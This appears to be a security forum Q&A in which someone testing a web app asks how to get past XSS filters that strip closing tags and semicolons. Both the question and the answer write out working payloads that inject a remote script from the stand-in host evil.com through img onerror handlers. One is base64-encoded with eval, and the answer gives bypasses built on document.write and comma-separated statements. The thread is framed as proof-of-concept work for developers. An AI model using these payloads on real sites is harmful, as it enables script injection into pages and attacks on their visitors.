I have found a web app that is vulnerable to XSS, and I can get some JavaScript running using an img tag; however, the method I am using destroys the rest of the page, as they are using some filters to attempt to stop it.
The filters I have detected so far are as follows:
- </anythingyouwant> gets replaced with nothing
- /> gets replaced with nothing
- ; gets replaced with a space until the next >
Injecting <img src="." onerror="alert('xss')"> works fine; however, these developers are rather sceptical and wish to see a full PoC of full JavaScript code. Is it possible to run an arbitrary script at all?
I have tried:
1. <img src="." onerror="eval(atob('Yj1kb2N1bWVudDthPWIuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7YS5zcmM9Jy8vZXZpbC5jb20vbXlzY3JpcHQnO2IuYm9keS5hcHBlbmRDaGlsZChhKQ=='))">
   Result: too long, even with a shortened URL.
2. <script src="//evil.com/myscript" />
   Result: can't close script tags like that, and it gets filtered, and it destroys the rest of the page because the web app omits the 'closing' tag.
3. <script src=//evil.com/myscript"></script>
   Result: gets filtered, destroys the rest of the page as above.
4. <img src="." onerror="b=document;a=b.createElement('script');a.src='//evil.com/myscript';b.body.appendChild(a)">
   Result: semicolons get filtered, breaks the web page.
5. <img src="." onerror="b=document a=b.createElement('script') a.src='//evil.com/myscript' b.body.appendChild(a)">
   Result: I'm unsure if this is valid JS, but it appears in the Chrome "view page source" as intended, but does not work as wanted.
I am using Chrome for testing, just in case it's relevant somehow.
The security measures you listed are definitely insufficient. Two examples I could imagine working for you:
<img src="." onerror="document.write('<script src=\'//evil.com/myscript\'><'+'/'+'script>')">
or your version with a , instead of a ; :
<img src="." onerror="b=document, a=b.createElement('script'), a.src='//evil.com/myscript', b.body.appendChild(a)">
But I am absolutely certain there are many other ways to do that. You could also check the following cheat sheet which I found in this answer.